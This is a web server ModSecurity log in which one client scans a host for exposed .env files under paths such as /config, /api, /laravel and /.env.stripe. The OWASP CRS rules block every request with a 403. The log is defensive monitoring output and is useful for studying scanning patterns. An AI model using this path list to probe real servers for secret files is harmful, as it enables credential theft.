[Thu Jan 08 21:17:29.895999 2026] [:error] [pid 1270037] [client 18.119.100.98:44504] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWAQ2eA_IfWyU2EIiRhOgAAAAAI"]
[Thu Jan 08 21:17:29.896172 2026] [:error] [pid 1270037] [client 18.119.100.98:44504] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWAQ2eA_IfWyU2EIiRhOgAAAAAI"]
[Thu Jan 08 21:17:30.242755 2026] [:error] [pid 1280390] [client 18.119.100.98:44606] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWAQ2tKTJIy7S9W5nL2LOwAAAAk"]
[Thu Jan 08 21:17:30.242957 2026] [:error] [pid 1280390] [client 18.119.100.98:44606] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWAQ2tKTJIy7S9W5nL2LOwAAAAk"]
[Thu Jan 08 21:17:30.243104 2026] [:error] [pid 1280390] [client 18.119.100.98:44606] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWAQ2tKTJIy7S9W5nL2LOwAAAAk"]
[Thu Jan 08 21:17:30.588065 2026] [:error] [pid 1270038] [client 18.119.100.98:44726] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stripe"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "aWAQ2hmwMJtANIcuNUXpIAAAAAM"]
[Thu Jan 08 21:17:30.588274 2026] [:error] [pid 1270038] [client 18.119.100.98:44726] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "aWAQ2hmwMJtANIcuNUXpIAAAAAM"]
[Thu Jan 08 21:17:30.588436 2026] [:error] [pid 1270038] [client 18.119.100.98:44726] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "aWAQ2hmwMJtANIcuNUXpIAAAAAM"]
[Thu Jan 08 21:17:30.934956 2026] [:error] [pid 1270039] [client 18.119.100.98:44822] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.stripe"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "aWAQ2pccQYhM1DUhi_W7BQAAAAQ"]
[Thu Jan 08 21:17:30.935170 2026] [:error] [pid 1270039] [client 18.119.100.98:44822] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "aWAQ2pccQYhM1DUhi_W7BQAAAAQ"]
[Thu Jan 08 21:17:30.935316 2026] [:error] [pid 1270039] [client 18.119.100.98:44822] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "aWAQ2pccQYhM1DUhi_W7BQAAAAQ"]
[Thu Jan 08 21:17:31.280251 2026] [:error] [pid 1270041] [client 18.119.100.98:44932] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.payment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "aWAQ283GwEx_BV8-CrWUQQAAAAU"]
[Thu Jan 08 21:17:31.280466 2026] [:error] [pid 1270041] [client 18.119.100.98:44932] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "aWAQ283GwEx_BV8-CrWUQQAAAAU"]
[Thu Jan 08 21:17:31.280633 2026] [:error] [pid 1270041] [client 18.119.100.98:44932] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "aWAQ283GwEx_BV8-CrWUQQAAAAU"]
[Thu Jan 08 21:17:32.362150 2026] [:error] [pid 1270036] [client 18.119.100.98:45248] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aWAQ3OM1154Q6b0hewij4QAAAAE"]
[Thu Jan 08 21:17:32.362405 2026] [:error] [pid 1270036] [client 18.119.100.98:45248] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aWAQ3OM1154Q6b0hewij4QAAAAE"]
[Thu Jan 08 21:17:32.362571 2026] [:error] [pid 1270036] [client 18.119.100.98:45248] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aWAQ3OM1154Q6b0hewij4QAAAAE"]
[Thu Jan 08 21:17:32.712796 2026] [:error] [pid 1270037] [client 18.119.100.98:45356] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWAQ3OA_IfWyU2EIiRhOgQAAAAI"]
[Thu Jan 08 21:17:32.713004 2026] [:error] [pid 1270037] [client 18.119.100.98:45356] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWAQ3OA_IfWyU2EIiRhOgQAAAAI"]
[Thu Jan 08 21:17:32.713185 2026] [:error] [pid 1270037] [client 18.119.100.98:45356] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aWAQ3OA_IfWyU2EIiRhOgQAAAAI"]
[Thu Jan 08 21:17:33.059837 2026] [:error] [pid 1280390] [client 18.119.100.98:45500] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWAQ3dKTJIy7S9W5nL2LPAAAAAk"]
[Thu Jan 08 21:17:33.060057 2026] [:error] [pid 1280390] [client 18.119.100.98:45500] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWAQ3dKTJIy7S9W5nL2LPAAAAAk"]
[Thu Jan 08 21:17:33.060212 2026] [:error] [pid 1280390] [client 18.119.100.98:45500] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWAQ3dKTJIy7S9W5nL2LPAAAAAk"]
[Thu Jan 08 21:17:33.404429 2026] [:error] [pid 1270038] [client 18.119.100.98:45620] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWAQ3RmwMJtANIcuNUXpIQAAAAM"]
[Thu Jan 08 21:17:33.405835 2026] [:error] [pid 1270038] [client 18.119.100.98:45620] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWAQ3RmwMJtANIcuNUXpIQAAAAM"]
[Thu Jan 08 21:17:33.406043 2026] [:error] [pid 1270038] [client 18.119.100.98:45620] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWAQ3RmwMJtANIcuNUXpIQAAAAM"]
[Thu Jan 08 21:17:33.755762 2026] [:error] [pid 1270039] [client 18.119.100.98:45766] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWAQ3ZccQYhM1DUhi_W7BgAAAAQ"]
[Thu Jan 08 21:17:33.755982 2026] [:error] [pid 1270039] [client 18.119.100.98:45766] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWAQ3ZccQYhM1DUhi_W7BgAAAAQ"]
[Thu Jan 08 21:17:33.756142 2026] [:error] [pid 1270039] [client 18.119.100.98:45766] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWAQ3ZccQYhM1DUhi_W7BgAAAAQ"]
[Thu Jan 08 21:17:34.102982 2026] [:error] [pid 1270043] [client 18.119.100.98:45866] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWAQ3gvEr1EpOYnVfM6rwQAAAAc"]
[Thu Jan 08 21:17:34.103191 2026] [:error] [pid 1270043] [client 18.119.100.98:45866] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWAQ3gvEr1EpOYnVfM6rwQAAAAc"]
[Thu Jan 08 21:17:34.103358 2026] [:error] [pid 1270043] [client 18.119.100.98:45866] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aWAQ3gvEr1EpOYnVfM6rwQAAAAc"]
[Thu Jan 08 21:17:34.454014 2026] [:error] [pid 1270035] [client 18.119.100.98:46000] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWAQ3iYqm_i2BUcmtQb4tgAAAAA"]
[Thu Jan 08 21:17:34.454233 2026] [:error] [pid 1270035] [client 18.119.100.98:46000] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWAQ3iYqm_i2BUcmtQb4tgAAAAA"]
[Thu Jan 08 21:17:34.454407 2026] [:error] [pid 1270035] [client 18.119.100.98:46000] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWAQ3iYqm_i2BUcmtQb4tgAAAAA"]
[Thu Jan 08 21:17:34.808888 2026] [:error] [pid 1270041] [client 18.119.100.98:46148] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWAQ3s3GwEx_BV8-CrWUQgAAAAU"]
[Thu Jan 08 21:17:34.809104 2026] [:error] [pid 1270041] [client 18.119.100.98:46148] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWAQ3s3GwEx_BV8-CrWUQgAAAAU"]
[Thu Jan 08 21:17:34.809256 2026] [:error] [pid 1270041] [client 18.119.100.98:46148] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWAQ3s3GwEx_BV8-CrWUQgAAAAU"]
[Thu Jan 08 21:17:35.154523 2026] [:error] [pid 1270042] [client 18.119.100.98:46270] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWAQ3y7RlX2cRjHcFz6xvgAAAAY"]
[Thu Jan 08 21:17:35.154758 2026] [:error] [pid 1270042] [client 18.119.100.98:46270] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWAQ3y7RlX2cRjHcFz6xvgAAAAY"]
[Thu Jan 08 21:17:35.154931 2026] [:error] [pid 1270042] [client 18.119.100.98:46270] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWAQ3y7RlX2cRjHcFz6xvgAAAAY"]
